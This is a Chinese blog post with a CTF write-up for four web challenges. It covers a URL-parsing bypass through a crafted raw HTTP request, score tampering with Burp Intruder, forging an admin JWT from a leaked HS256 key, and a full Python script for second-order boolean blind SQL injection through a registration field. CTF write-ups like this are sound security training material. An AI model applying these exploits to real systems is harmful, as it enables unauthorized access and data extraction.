N0rth3ty's Blog.

网鼎杯第三场WP

字数统计: 725阅读时长: 3 min
2018/09/12 Share

有的时候题目虽然会做,但基础决定很多东西
大概这是这场比赛给我最大的感受

web

Web1

uri里面包含 . 会被禁止,需要构造 . 开头的请求,于是利用Apache2的trick,构造 ``..@c7f.zhuque.com/..//?a=1这样首先会进入一个不存在的地址..@c7f.zhuque.com然后从../ 跳出来,这个时候parse_url的结果是

1
2
3
4
5
6
Array
(
[scheme] => ..
[host] => c7f.zhuque.com
[path] => /../..//
)

题目解析后url变为 http://127.0.1..@c7f.zhuque.com/..//?a=1 , 这个时候 parse_url的结果是

1
2
3
4
5
6
7
8
Array
(
[scheme] => http
[host] => c7f.zhuque.com
[user] => 127.0.0.1..
[path] => /../..//
[query] => ?a=1
)

可以通过检查,于是在burp里面发送请求

1
2
3
4
5
6
7
8
9
GET ..@c7f.zhuque.com/..//?a=1 HTTP/1.1
Host: 117.50.11.83
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

在回包的header中获得flag flag{f3efb5dc-2b79-47ab-89dd-c9a36915e729}

Web2

访问index,其中js有一段关键代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$.ajax({
type: 'POST',
url: './index.php',
data: {
getGod: fs
},
success: function(data) {
if (data == '0') ;
else if (data == '1') alert("Error!");
else alert(data)
},
error: function() {
alert("未知错误...");
window.open("./index.php", "_0")
}
})

看了下网络请求分数会从这个接口一直更新,
打开Burp,拦截下第一个分数为0的请求,使用intruder每次加一,获得flag
flag{cc090255-5786-4a30-bc1d-e74ad1861b42}

Web3

test登录看cookie, 是jwt验证,验证算法是hs256,给了key,可以直接获取admin的cookie

1
2
3
4
5
import jwt
s = "uy8qz-!kru%*2h7$q&veq=y_r1abu-xd_219y%phex!@4hv62+"
encoded = jwt.encode({'username': 'admin'}, s, algorithm='HS256')
print(encoded)
# 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.NYSsNZ1gR8EUYebNTmXPBhdoh-mA5OjHkeWjM4gPxqY'

admin登录获取flag

Web4

二阶布尔盲注,payload如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import time
import random

# https://github.com/LyleMi/Saker
from saker.main import Saker
from saker.fuzzers.sqli import SQLi


class Cli(Saker):

def __init__(self, url):
super(Cli, self).__init__(url)

def login(self, username, password="test"):
params = {"page": "login"}
data = {
"username": username,
"password": password,
"login": "Login",
}
self.post("login.php", params=params, data=data)
print(self.lastr.content)

def register(self, username, phone, password="test"):
params = {"page": "register"}
data = {
"username": username,
"password": password,
"register": "Login",
"phone": phone,
}
self.post("register.php", params=params, data=data)
# print(self.lastr.content)

def query(self):
self.get("query.php")
print(self.lastr.content)

def logout(self):
self.get("logout.php")
print(self.lastr.content)


if __name__ == '__main__':
url = "http://bc5bac220e2441efaa68974b28620fe74f38f99c7d884171.game.ichunqiu.com/"
c = Cli(url)
name = "rebirth" + str(random.random())
# 注册一个
phone = "1"
c.register("lyle", phone)

mid = 256
pos = 0
guess = 0
content = ''
while pos < 60:
mid /= 2
payload = SQLi.schemas(1) # get test database
payload = SQLi.tables("test") # get flag
payload = SQLi.columns("test", "flag")
payload = "select f14g from test.flag"
payload = SQLi.sub(payload, pos, mid)
if mid == 0:
mid = 256
pos += 1
content += chr(guess)
print 'flag', content
guess = 0
else:
guess <<= 1
name = "rebirth" + str(random.random())
phone = "1' and %s #" % payload
# print(phone)
# exit()
phone = "0x" + phone.encode("hex")
while True:
try:
c.register(name, phone)
c.query()
break
except Exception as e:
# 网络原因
print(e)
time.sleep(1)

guess += int("0人" not in c.lastr.content)

最后获得flag flag{d2d777d5-74c5-4728-93f7-2d310a79becc}

CATALOG
  1. 1. web
    1. 1.1. Web1
    2. 1.2. Web2
    3. 1.3. Web3
    4. 1.4. Web4